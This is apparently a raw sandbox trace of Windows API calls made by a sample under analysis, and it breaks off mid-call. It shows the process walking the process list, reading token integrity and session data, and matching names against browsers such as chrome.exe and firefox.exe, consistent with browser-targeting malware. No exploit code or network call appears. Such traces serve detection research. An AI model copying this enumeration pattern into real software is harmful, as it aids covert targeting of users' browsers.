GetTokenInformation (in: TokenHandle=0x58c, TokenInformationClass=0xc, TokenInformation=0xfcfabc, TokenInformationLength=0x4, ReturnLength=0xfcfaa0 | out: TokenInformation=0xfcfabc, ReturnLength=0xfcfaa0) returned 1 [0220.713] CloseHandle (hObject=0x58c) returned 1 [0220.713] CloseHandle (hObject=0x584) returned 1 [0220.713] GetLengthSid (pSid=0xedc4a8*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x68))) returned 0x1c [0220.713] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x890) returned 0x584 [0220.713] GetVersionExW (in: lpVersionInformation=0xfcf990*(dwOSVersionInfoSize=0x11c, dwMajorVersion=0x80, dwMinorVersion=0x2d7f58, dwBuildNumber=0xc800844c, dwPlatformId=0xf0d330, szCSDVersion="\x01") | out: lpVersionInformation=0xfcf990*(dwOSVersionInfoSize=0x11c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0220.713] OpenProcessToken (in: ProcessHandle=0x584, DesiredAccess=0x20008, TokenHandle=0xfcfabc | out: TokenHandle=0xfcfabc*=0x58c) returned 1 [0220.713] GetTokenInformation (in: TokenHandle=0x58c, TokenInformationClass=0x19, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0xfcfab8 | out: TokenInformation=0x0, ReturnLength=0xfcfab8) returned 0 [0220.713] GetLastError () returned 0x7a [0220.714] GetTokenInformation (in: TokenHandle=0x58c, TokenInformationClass=0x19, TokenInformation=0xedbb70, TokenInformationLength=0x14, ReturnLength=0xfcfab8 | out: TokenInformation=0xedbb70, ReturnLength=0xfcfab8) returned 1 [0220.714] GetSidSubAuthorityCount (pSid=0xedbb78*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000)) returned 0xedbb79 [0220.714] GetSidSubAuthority (pSid=0xedbb78*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000), nSubAuthority=0x0) returned 0xedbb80 [0220.714] CloseHandle (hObject=0x58c) returned 1 [0220.714] CloseHandle (hObject=0x584) returned 1 [0220.714] lstrcmpiW (lpString1="firefox.exe", lpString2="disclaimer_saudi_agreed_oem.exe") returned 1 [0220.714] lstrcmpiW (lpString1="chrome.exe", lpString2="disclaimer_saudi_agreed_oem.exe") returned -1 [0220.714] lstrcmpiW (lpString1="opera.exe", lpString2="disclaimer_saudi_agreed_oem.exe") returned 1 [0220.714] lstrcmpiW (lpString1="iexplore.exe", lpString2="disclaimer_saudi_agreed_oem.exe") returned 1 [0220.714] lstrcmpiW (lpString1="MicrosoftEdge.exe", lpString2="disclaimer_saudi_agreed_oem.exe") returned 1 [0220.714] lstrcmpiW (lpString1="MicrosoftEdgeCP.exe", lpString2="disclaimer_saudi_agreed_oem.exe") returned 1 [0220.714] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x8a0) returned 0x584 [0220.714] OpenProcessToken (in: ProcessHandle=0x584, DesiredAccess=0x8, TokenHandle=0xfcfaa4 | out: TokenHandle=0xfcfaa4*=0x58c) returned 1 [0220.714] GetTokenInformation (in: TokenHandle=0x58c, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0xfcfa8c | out: TokenInformation=0x0, ReturnLength=0xfcfa8c) returned 0 [0220.714] GetLastError () returned 0x7a [0220.714] GetTokenInformation (in: TokenHandle=0x58c, TokenInformationClass=0x1, TokenInformation=0xedc4a0, TokenInformationLength=0x24, ReturnLength=0xfcfa8c | out: TokenInformation=0xedc4a0, ReturnLength=0xfcfa8c) returned 1 [0220.714] GetTokenInformation (in: TokenHandle=0x58c, TokenInformationClass=0xc, TokenInformation=0xfcfabc, TokenInformationLength=0x4, ReturnLength=0xfcfaa0 | out: TokenInformation=0xfcfabc, ReturnLength=0xfcfaa0) returned 1 [0220.714] CloseHandle (hObject=0x58c) returned 1 [0220.714] CloseHandle (hObject=0x584) returned 1 [0220.715] GetLengthSid (pSid=0xedc4a8*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x68))) returned 0x1c [0220.715] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x8a0) returned 0x584 [0220.715] GetVersionExW (in: lpVersionInformation=0xfcf990*(dwOSVersionInfoSize=0x11c, dwMajorVersion=0x80, dwMinorVersion=0x2d80b8, dwBuildNumber=0xc800844c, dwPlatformId=0xf0d330, szCSDVersion="\x01") | out: lpVersionInformation=0xfcf990*(dwOSVersionInfoSize=0x11c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0220.715] OpenProcessToken (in: ProcessHandle=0x584, DesiredAccess=0x20008, TokenHandle=0xfcfabc | out: TokenHandle=0xfcfabc*=0x58c) returned 1 [0220.715] GetTokenInformation (in: TokenHandle=0x58c, TokenInformationClass=0x19, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0xfcfab8 | out: TokenInformation=0x0, ReturnLength=0xfcfab8) returned 0 [0220.715] GetLastError () returned 0x7a [0220.715] GetTokenInformation (in: TokenHandle=0x58c, TokenInformationClass=0x19, TokenInformation=0xedbb70, TokenInformationLength=0x14, ReturnLength=0xfcfab8 | out: TokenInformation=0xedbb70, ReturnLength=0xfcfab8) returned 1 [0220.715] GetSidSubAuthorityCount (pSid=0xedbb78*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000)) returned 0xedbb79 [0220.715] GetSidSubAuthority (pSid=0xedbb78*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000), nSubAuthority=0x0) returned 0xedbb80 [0220.715] CloseHandle (hObject=0x58c) returned 1 [0220.715] CloseHandle (hObject=0x584) returned 1 [0220.715] lstrcmpiW (lpString1="firefox.exe", lpString2="colleague wrap.exe") returned 1 [0220.715] lstrcmpiW (lpString1="chrome.exe", lpString2="colleague wrap.exe") returned -1 [0220.715] lstrcmpiW (lpString1="opera.exe", lpString2="colleague wrap.exe") returned 1 [0220.715] lstrcmpiW (lpString1="iexplore.exe", lpString2="colleague wrap.exe") returned 1 [0220.715] lstrcmpiW (lpString1="MicrosoftEdge.exe", lpString2="colleague wrap.exe") returned 1 [0220.715] lstrcmpiW (lpString1="MicrosoftEdgeCP.exe", lpString2="colleague wrap.exe") returned 1 [0220.715] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x8b0) returned 0x584 [0220.716] OpenProcessToken (in: ProcessHandle=0x584, DesiredAccess=0x8, TokenHandle=0xfcfaa4 | out: TokenHandle=0xfcfaa4*=0x58c) returned 1 [0220.716] GetTokenInformation (in: TokenHandle=0x58c, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0xfcfa8c | out: TokenInformation=0x0, ReturnLength=0xfcfa8c) returned 0 [0220.716] GetLastError () returned 0x7a [0220.716] GetTokenInformation (in: TokenHandle=0x58c, TokenInformationClass=0x1, TokenInformation=0xedc4a0, TokenInformationLength=0x24, ReturnLength=0xfcfa8c | out: TokenInformation=0xedc4a0, ReturnLength=0xfcfa8c) returned 1 [0220.716] GetTokenInformation (in: TokenHandle=0x58c, TokenInformationClass=0xc, TokenInformation=0xfcfabc, TokenInformationLength=0x4, ReturnLength=0xfcfaa0 | out: TokenInformation=0xfcfabc, ReturnLength=0xfcfaa0) returned 1 [0220.716] CloseHandle (hObject=0x58c) returned 1 [0220.716] CloseHandle (hObject=0x584) returned 1 [0220.716] GetLengthSid (pSid=0xedc4a8*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x68))) returned 0x1c [0220.716] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x8b0) returned 0x584 [0220.716] GetVersionExW (in: lpVersionInformation=0xfcf990*(dwOSVersionInfoSize=0x11c, dwMajorVersion=0x80, dwMinorVersion=0x2d8230, dwBuildNumber=0xc800844c, dwPlatformId=0xf0d330, szCSDVersion="\x01") | out: lpVersionInformation=0xfcf990*(dwOSVersionInfoSize=0x11c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0220.716] OpenProcessToken (in: ProcessHandle=0x584, DesiredAccess=0x20008, TokenHandle=0xfcfabc | out: TokenHandle=0xfcfabc*=0x58c) returned 1 [0220.716] GetTokenInformation (in: TokenHandle=0x58c, TokenInformationClass=0x19, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0xfcfab8 | out: TokenInformation=0x0, ReturnLength=0xfcfab8) returned 0 [0220.716] GetLastError () returned 0x7a [0220.716] GetTokenInformation (in: TokenHandle=0x58c, TokenInformationClass=0x19, TokenInformation=0xedbb70, TokenInformationLength=0x14, ReturnLength=0xfcfab8 | out: TokenInformation=0xedbb70, ReturnLength=0xfcfab8) returned 1 [0220.716] GetSidSubAuthorityCount (pSid=0xedbb78*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000)) returned 0xedbb79 [0220.716] GetSidSubAuthority (pSid=0xedbb78*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000), nSubAuthority=0x0) returned 0xedbb80 [0220.716] CloseHandle (hObject=0x58c) returned 1 [0220.716] CloseHandle (hObject=0x584) returned 1 [0220.717] lstrcmpiW (lpString1="firefox.exe", lpString2="hottest-jm-depression-fought.exe") returned -1 [0220.717] lstrcmpiW (lpString1="chrome.exe", lpString2="hottest-jm-depression-fought.exe") returned -1 [0220.717] lstrcmpiW (lpString1="opera.exe", lpString2="hottest-jm-depression-fought.exe") returned 1 [0220.717] lstrcmpiW (lpString1="iexplore.exe", lpString2="hottest-jm-depression-fought.exe") returned 1 [0220.717] lstrcmpiW (lpString1="MicrosoftEdge.exe", lpString2="hottest-jm-depression-fought.exe") returned 1 [0220.717] lstrcmpiW (lpString1="MicrosoftEdgeCP.exe", lpString2="hottest-jm-depression-fought.exe") returned 1 [0220.717] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x8c8) returned 0x584 [0220.717] OpenProcessToken (in: ProcessHandle=0x584, DesiredAccess=0x8, TokenHandle=0xfcfaa4 | out: TokenHandle=0xfcfaa4*=0x58c) returned 1 [0220.717] GetTokenInformation (in: TokenHandle=0x58c, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0xfcfa8c | out: TokenInformation=0x0, ReturnLength=0xfcfa8c) returned 0 [0220.717] GetLastError () returned 0x7a [0220.717] GetTokenInformation (in: TokenHandle=0x58c, TokenInformationClass=0x1, TokenInformation=0xedc4a0, TokenInformationLength=0x24, ReturnLength=0xfcfa8c | out: TokenInformation=0xedc4a0, ReturnLength=0xfcfa8c) returned 1 [0220.717] GetTokenInformation (in: TokenHandle=0x58c, TokenInformationClass=0xc, TokenInformation=0xfcfabc, TokenInformationLength=0x4, ReturnLength=0xfcfaa0 | out: TokenInformation=0xfcfabc, ReturnLength=0xfcfaa0) returned 1 [0220.717] CloseHandle (hObject=0x58c) returned 1 [0220.717] CloseHandle (hObject=0x584) returned 1 [0220.717] GetLengthSid (pSid=0xedc4a8*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x68))) returned 0x1c [0220.717] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x8c8) returned 0x584 [0220.717] GetVersionExW (in: lpVersionInformation=0xfcf990*(dwOSVersionInfoSize=0x11c, dwMajorVersion=0x80, dwMinorVersion=0x2d8390, dwBuildNumber=0xc800844c, dwPlatformId=0xf0d330, szCSDVersion="\x01") | out: lpVersionInformation=0xfcf990*(dwOSVersionInfoSize=0x11c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0220.717] OpenProcessToken (in: ProcessHandle=0x584, DesiredAccess=0x20008, TokenHandle=0xfcfabc | out: TokenHandle=0xfcfabc*=0x58c) returned 1 [0220.717] GetTokenInformation (in: TokenHandle=0x58c, TokenInformationClass=0x19, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0xfcfab8 | out: TokenInformation=0x0, ReturnLength=0xfcfab8) returned 0 [0220.717] GetLastError () returned 0x7a [0220.717] GetTokenInformation (in: TokenHandle=0x58c, TokenInformationClass=0x19, TokenInformation=0xedbb70, TokenInformationLength=0x14, ReturnLength=0xfcfab8 | out: TokenInformation=0xedbb70, ReturnLength=0xfcfab8) returned 1 [0220.717] GetSidSubAuthorityCount (pSid=0xedbb78*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000)) returned 0xedbb79 [0220.717] GetSidSubAuthority (pSid=0xedbb78*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000), nSubAuthority=0x0) returned 0xedbb80 [0220.717] CloseHandle (hObject=0x58c) returned 1 [0220.718] CloseHandle (hObject=0x584) returned 1 [0220.718] lstrcmpiW (lpString1="firefox.exe", lpString2="saturday.exe") returned -1 [0220.718] lstrcmpiW (lpString1="chrome.exe", lpString2="saturday.exe") returned -1 [0220.718] lstrcmpiW (lpString1="opera.exe", lpString2="saturday.exe") returned -1 [0220.718] lstrcmpiW (lpString1="iexplore.exe", lpString2="saturday.exe") returned -1 [0220.718] lstrcmpiW (lpString1="MicrosoftEdge.exe", lpString2="saturday.exe") returned -1 [0220.718] lstrcmpiW (lpString1="MicrosoftEdgeCP.exe", lpString2="saturday.exe") returned -1 [0220.718] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x954) returned 0x584 [0220.718] OpenProcessToken (in: ProcessHandle=0x584, DesiredAccess=0x8, TokenHandle=0xfcfaa4 | out: TokenHandle=0xfcfaa4*=0x58c) returned 1 [0220.718] GetTokenInformation (in: TokenHandle=0x58c, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0xfcfa8c | out: TokenInformation=0x0, ReturnLength=0xfcfa8c) returned 0 [0220.718] GetLastError () returned 0x7a [0220.718] GetTokenInformation (in: TokenHandle=0x58c, TokenInformationClass=0x1, TokenInformation=0xedc4a0, TokenInformationLength=0x24, ReturnLength=0xfcfa8c | out: TokenInformation=0xedc4a0, ReturnLength=0xfcfa8c) returned 1 [0220.718] GetTokenInformation (in: TokenHandle=0x58c, TokenInformationClass=0xc, TokenInformation=0xfcfabc, TokenInformationLength=0x4, ReturnLength=0xfcfaa0 | out: TokenInformation=0xfcfabc, ReturnLength=0xfcfaa0) returned 1 [0220.718] CloseHandle (hObject=0x58c) returned 1 [0220.718] CloseHandle (hObject=0x584) returned 1 [0220.718] GetLengthSid (pSid=0xedc4a8*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x68))) returned 0x1c [0220.718] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x954) returned 0x584 [0220.718] GetVersionExW (in: lpVersionInformation=0xfcf990*(dwOSVersionInfoSize=0x11c, dwMajorVersion=0x80, dwMinorVersion=0x2d8510, dwBuildNumber=0xc800844c, dwPlatformId=0xf0d330, szCSDVersion="\x01") | out: lpVersionInformation=0xfcf990*(dwOSVersionInfoSize=0x11c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0220.718] OpenProcessToken (in: ProcessHandle=0x584, DesiredAccess=0x20008, TokenHandle=0xfcfabc | out: TokenHandle=0xfcfabc*=0x58c) returned 1 [0220.718] GetTokenInformation (in: TokenHandle=0x58c, TokenInformationClass=0x19, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0xfcfab8 | out: TokenInformation=0x0, ReturnLength=0xfcfab8) returned 0 [0220.718] GetLastError () returned 0x7a [0220.718] GetTokenInformation (in: TokenHandle=0x58c, TokenInformationClass=0x19, TokenInformation=0xedbb70, TokenInformationLength=0x14, ReturnLength=0xfcfab8 | out: TokenInformation=0xedbb70, ReturnLength=0xfcfab8) returned 1 [0220.718] GetSidSubAuthorityCount (pSid=0xedbb78*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000)) returned 0xedbb79 [0220.719] GetSidSubAuthority (pSid=0xedbb78*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000), nSubAuthority=0x0) returned 0xedbb80 [0220.719] CloseHandle (hObject=0x58c) returned 1 [0220.719] CloseHandle (hObject=0x584) returned 1 [0220.719] lstrcmpiW (lpString1="firefox.exe", lpString2="WINWORD.EXE") returned -1 [0220.719] lstrcmpiW (lpString1="chrome.exe", lpString2="WINWORD.EXE") returned -1 [0220.719] lstrcmpiW (lpString1="opera.exe", lpString2="WINWORD.EXE") returned -1 [0220.719] lstrcmpiW (lpString1="iexplore.exe", lpString2="WINWORD.EXE") returned -1 [0220.719] lstrcmpiW (lpString1="MicrosoftEdge.exe", lpString2="WINWORD.EXE") returned -1 [0220.719] lstrcmpiW (lpString1="MicrosoftEdgeCP.exe", lpString2="WINWORD.EXE") returned -1 [0220.719] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x9a0) returned 0x0 [0220.719] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x9e0) returned 0x0 [0220.719] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xbe8) returned 0x0 [0220.719] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x6cc) returned 0x0 [0220.719] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xa18) returned 0x0 [0220.719] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x5fc) returned 0x584 [0220.719] OpenProcessToken (in: ProcessHandle=0x584, DesiredAccess=0x8, TokenHandle=0xfcfaa4 | out: TokenHandle=0xfcfaa4*=0x58c) returned 1 [0220.719] GetTokenInformation (in: TokenHandle=0x58c, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0xfcfa8c | out: TokenInformation=0x0, ReturnLength=0xfcfa8c) returned 0 [0220.719] GetLastError () returned 0x7a [0220.719] GetTokenInformation (in: TokenHandle=0x58c, TokenInformationClass=0x1, TokenInformation=0xedc4a0, TokenInformationLength=0x24, ReturnLength=0xfcfa8c | out: TokenInformation=0xedc4a0, ReturnLength=0xfcfa8c) returned 1 [0220.719] GetTokenInformation (in: TokenHandle=0x58c, TokenInformationClass=0xc, TokenInformation=0xfcfabc, TokenInformationLength=0x4, ReturnLength=0xfcfaa0 | out: TokenInformation=0xfcfabc, ReturnLength=0xfcfaa0) returned 1 [0220.719] CloseHandle (hObject=0x58c) returned 1 [0220.719] CloseHandle (hObject=0x584) returned 1 [0220.719] GetLengthSid (pSid=0xedc4a8*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x68))) returned 0x1c [0220.719] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x5fc) returned 0x584 [0220.719] GetVersionExW (in: lpVersionInformation=0xfcf990*(dwOSVersionInfoSize=0x11c, dwMajorVersion=0x80, dwMinorVersion=0x2d8ae8, dwBuildNumber=0xc800844c, dwPlatformId=0xf0d330, szCSDVersion="\x01") | out: lpVersionInformation=0xfcf990*(dwOSVersionInfoSize=0x11c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0220.719] OpenProcessToken (in: ProcessHandle=0x584, DesiredAccess=0x20008, TokenHandle=0xfcfabc | out: TokenHandle=0xfcfabc*=0x58c) returned 1 [0220.719] GetTokenInformation (in: TokenHandle=0x58c, TokenInformationClass=0x19, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0xfcfab8 | out: TokenInformation=0x0, ReturnLength=0xfcfab8) returned 0 [0220.720] GetLastError () returned 0x7a [0220.720] GetTokenInformation (in: TokenHandle=0x58c, TokenInformationClass=0x19, TokenInformation=0xedbb70, TokenInformationLength=0x14, ReturnLength=0xfcfab8 | out: TokenInformation=0xedbb70, ReturnLength=0xfcfab8) returned 1 [0220.720] GetSidSubAuthorityCount (pSid=0xedbb78*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000)) returned 0xedbb79 [0220.720] GetSidSubAuthority (pSid=0xedbb78*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000), nSubAuthority=0x0) returned 0xedbb80 [0220.720] CloseHandle (hObject=0x58c) returned 1 [0220.720] CloseHandle (hObject=0x584) returned 1 [0220.720] lstrcmpiW (lpString1="firefox.exe", lpString2="svchost.exe") returned -1 [0220.720] lstrcmpiW (lpString1="chrome.exe", lpString2="svchost.exe") returned -1 [0220.720] lstrcmpiW (lpString1="opera.exe", lpString2="svchost.exe") returned -1 [0220.720] lstrcmpiW (lpString1="iexplore.exe", lpString2="svchost.exe") returned -1 [0220.720] lstrcmpiW (lpString1="MicrosoftEdge.exe", lpString2="svchost.exe") returned -1 [0220.720] lstrcmpiW (lpString1="MicrosoftEdgeCP.exe", lpString2="svchost.exe") returned -1 [0220.720] VirtualFree (lpAddress=0x2d0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0220.720] WaitForSingleObject (hHandle=0x8, dwMilliseconds=0x7d0) returned 0x102 [0222.729] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x0, Length=0x0, ResultLength=0xfcfadc | out: SystemInformation=0x0, ResultLength=0xfcfadc*=0xc190) returned 0xc0000004 [0222.729] VirtualAlloc (lpAddress=0x0, dwSize=0xd190, flAllocationType=0x1000, flProtect=0x4) returned 0x2e0000 [0222.730] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x2e0000, Length=0xd190, ResultLength=0x0 | out: SystemInformation=0x2e0000, ResultLength=0x0) returned 0x0 [0222.731] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x0) returned 0x0 [0222.731] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x4) returned 0x0 [0222.731] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x108) returned 0x0 [0222.732] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x14c) returned 0x0 [0222.732] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x17c) returned 0x0 [0222.732] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x188) returned 0x0 [0222.732] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1b0) returned 0x0 [0222.732] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1dc) returned 0x0 [0222.732] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1e4) returned 0x0 [0222.732] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1ec) returned 0x0 [0222.732] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x258) returned 0x0 [0222.732] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x298) returned 0x0 [0222.732] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x2c8) returned 0x0 [0222.733] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x314) returned 0x0 [0222.733] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x35c) returned 0x0 [0222.733] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3a0) returned 0x0 [0222.733] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3f8) returned 0x0 [0222.733] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x178) returned 0x0 [0222.733] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x160) returned 0x0 [0222.733] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x418) returned 0x0 [0222.733] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x4dc) returned 0x0 [0222.733] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x4e4) returned 0x584 [0222.734] OpenProcessToken (in: ProcessHandle=0x584, DesiredAccess=0x8, TokenHandle=0xfcfaa4 | out: TokenHandle=0xfcfaa4*=0x590) returned 1 [0222.734] GetTokenInformation (in: TokenHandle=0x590, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0xfcfa8c | out: TokenInformation=0x0, ReturnLength=0xfcfa8c) returned 0 [0222.734] GetLastError () returned 0x7a [0222.734] GetTokenInformation (in: TokenHandle=0x590, TokenInformationClass=0x1, TokenInformation=0xedc4a0, TokenInformationLength=0x24, ReturnLength=0xfcfa8c | out: TokenInformation=0xedc4a0, ReturnLength=0xfcfa8c) returned 1 [0222.734] GetTokenInformation (in: TokenHandle=0x590, TokenInformationClass=0xc, TokenInformation=0xfcfabc, TokenInformationLength=0x4, ReturnLength=0xfcfaa0 | out: TokenInformation=0xfcfabc, ReturnLength=0xfcfaa0) returned 1 [0222.734] CloseHandle (hObject=0x590) returned 1 [0222.734] CloseHandle (hObject=0x584) returned 1 [0222.734] GetLengthSid (pSid=0xedc4a8*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x68))) returned 0x1c [0222.734] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x4e4) returned 0x584 [0222.734] GetVersionExW (in: lpVersionInformation=0xfcf990*(dwOSVersionInfoSize=0x11c, dwMajorVersion=0x80, dwMinorVersion=0x2da060, dwBuildNumber=0xc800844c, dwPlatformId=0xf0d330, szCSDVersion="\x01") | out: lpVersionInformation=0xfcf990*(dwOSVersionInfoSize=0x11c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0222.734] OpenProcessToken (in: ProcessHandle=0x584, DesiredAccess=0x20008, TokenHandle=0xfcfabc | out: TokenHandle=0xfcfabc*=0x590) returned 1 [0222.734] GetTokenInformation (in: TokenHandle=0x590, TokenInformationClass=0x19, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0xfcfab8 | out: TokenInformation=0x0, ReturnLength=0xfcfab8) returned 0 [0222.734] GetLastError () returned 0x7a [0222.734] GetTokenInformation (in: TokenHandle=0x590, TokenInformationClass=0x19, TokenInformation=0xedbb70, TokenInformationLength=0x14, ReturnLength=0xfcfab8 | out: TokenInformation=0xedbb70, ReturnLength=0xfcfab8) returned 1 [0222.734] GetSidSubAuthorityCount (pSid=0xedbb78*(Revision=0x1, SubAuthorityCount=0x1, 